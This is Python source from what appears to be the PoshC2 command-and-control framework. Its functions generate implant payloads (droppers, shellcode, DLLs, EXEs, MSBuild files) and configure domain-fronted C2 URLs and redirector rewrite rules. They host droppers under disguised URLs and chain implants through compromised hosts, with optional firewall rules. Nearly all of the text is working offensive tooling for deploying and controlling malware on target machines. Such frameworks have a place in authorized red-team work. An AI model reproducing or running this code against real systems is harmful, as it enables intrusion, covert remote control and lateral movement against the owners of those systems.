def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ") comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ") domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ") proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ") pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ") comms_url, PayloadCommsHostCount = string_to_array(comms_url) domainfront, DomainFrontHeaderCount = string_to_array(domainfront) if PayloadCommsHostCount == DomainFrontHeaderCount: pass else: print("[-] Error - different number of host headers and URLs") input("Press Enter to continue...") clear() proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() else: imurl = get_newimplanturl() C2 = get_c2server_all() urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) if shellcodeOnly: newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) else: newPayload.CreateAll("%s_" % name) print_good("Created new payloads") input("Press Enter to continue...") clear()
def do_createdaisypayload(user, command): name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ") default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) daisyurl = input(f"Daisy URL: e.g. {default_url} ") if ("http://127.0.0.1" in daisyurl): daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost") if ("https://127.0.0.1" in daisyurl): daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost") daisyhostid = input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" pbindsecret = PBindSecret pbindpipename = PBindPipeName daisyurl, daisyurl_count = string_to_array(daisyurl) daisyhostheader = "" c = 0 daisyurls = daisyurl.split(",") for url in daisyurls: if c > 0: daisyhostheader += ",\"\"" else: daisyhostheader += "\"\"" c += 1 C2 = get_c2server_all() urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) newPayload.CreateRaw("%s_" % name) newPayload.CreateDlls("%s_" % name) newPayload.CreateEXE("%s_" % name) newPayload.CreateMsbuild("%s_" % name) newPayload.CreateDonutShellcode("%s_" % name) print_good("Created new %s daisy payloads" % name) input("Press Enter to continue...") clear()
def newdb(db): print("Initializing new project folder and %s database" % db.value + Colours.GREEN) print("") directory = os.path.dirname(PoshProjectDirectory) if not os.path.exists(directory): os.makedirs(directory) if not os.path.exists("%s/downloads" % directory): os.makedirs("%s/downloads" % directory) if not os.path.exists("%s/reports" % directory): os.makedirs("%s/reports" % directory) if not os.path.exists("%s/payloads" % directory): os.makedirs("%s/payloads" % directory) initializedb() if not validate_sleep_time(DefaultSleep): print(Colours.RED) print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) sys.exit(1) setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, GET_404_Response, PoshProjectDirectory, QuickCommand, DownloadURI, "", "", "", URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, Slack_UserID, Slack_Channel, Slack_BotToken, EnableNotifications) rewriteFile = "%s/rewrite-rules.txt" % directory print("Creating Rewrite Rules in: " + rewriteFile) rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1", "# If running Apache 2.4.52 or Later", "Proxy100Continue Off"] rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules() with open(rewriteFile, 'w') as outFile: for line in rewriteFileContents: outFile.write(line) outFile.write('\n') outFile.close() C2 = get_c2server_all() urlId = new_urldetails("default", C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId) newPayload.CreateAll() create_self_signed_cert(PoshProjectDirectory) newPayload.WriteQuickstart(directory + '/quickstart.txt') # adding default hosted payloads QuickCommandURI = select_item("QuickCommand", "C2Server") insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def existingdb(db): print("Using existing %s database / project" % db.value + Colours.GREEN) database_connect() C2 = get_c2server_all() if ((C2.PayloadCommsHost == PayloadCommsHost) and (C2.DomainFrontHeader == DomainFrontHeader)): qstart = "%squickstart.txt" % (PoshProjectDirectory) if os.path.exists(qstart): with open(qstart, 'r') as f: print(f.read()) else: print("Error different IP so regenerating payloads") if os.path.exists("%spayloads_old" % PoshProjectDirectory): import shutil shutil.rmtree("%spayloads_old" % PoshProjectDirectory) os.rename("%spayloads" % PoshProjectDirectory, "%spayloads_old" % PoshProjectDirectory) os.makedirs("%spayloads" % PoshProjectDirectory) update_item("PayloadCommsHost", "C2Server", PayloadCommsHost) update_item("QuickCommand", "C2Server", QuickCommand) update_item("DomainFrontHeader", "C2Server", DomainFrontHeader) C2 = get_c2server_all() urlId = new_urldetails(f"updated_host-{datetime.strftime(datetime.now(timezone.utc), '%Y-%m-%d-%H:%M:%S')}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId) newPayload.CreateAll() newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt') # adding default hosted payloads QuickCommandURI = select_item("QuickCommand", "C2Server") insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes") insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes") insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes") insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def do_startdaisy(user, command, randomuri): check_module_loaded("invoke-daisychain.ps1", randomuri, user) elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END) domain_front = "" proxy_user = "" proxy_pass = "" proxy_url = "" cred_expiry = "" if elevated.lower() == "n": cont = input( Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END) if cont.lower() == "n" or cont == "": return bind_ip = "localhost" else: bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END) bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END) firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END) default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) default_df_header = get_first_dfheader(DomainFrontHeader) if default_df_header == default_url: default_df_header = None if firstdaisy.lower() == "y" or firstdaisy == "": upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END) domain_front = input( Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END) proxy_user = input( Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END) proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END) proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END) cred_expiry = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ") if not upstream_url: upstream_url = default_url if not domain_front: if default_df_header: domain_front = default_df_header else: domain_front = "" else: upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END) upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END) upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}" command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}" if domain_front: command = command + f" -domfront {domain_front}" if proxy_url: command = command + f" -proxyurl '{proxy_url}'" if proxy_user: command = command + f" -proxyuser '{proxy_user}'" if proxy_pass: command = command + f" -proxypassword '{proxy_pass}'" if elevated.lower() == "y" or elevated == "": firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ") if firewall.lower() == "n" or firewall == "": command = command + " -nofwrule" else: print_good( "Not elevated so binding to localhost and not adding firewall rule" ) command = command + " -localhost" urls = get_allurls() command = command + f" -urls '{urls}'" new_task(command, user, randomuri) update_label("DaisyHost", randomuri) createpayloads = input( Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ") if createpayloads.lower() == "y" or createpayloads == "": name = input(Colours.GREEN + "Enter a payload name: " + Colours.END) daisyhost = get_implantdetails(randomuri) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers(name) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) print_good("Created new %s daisy payloads" % name)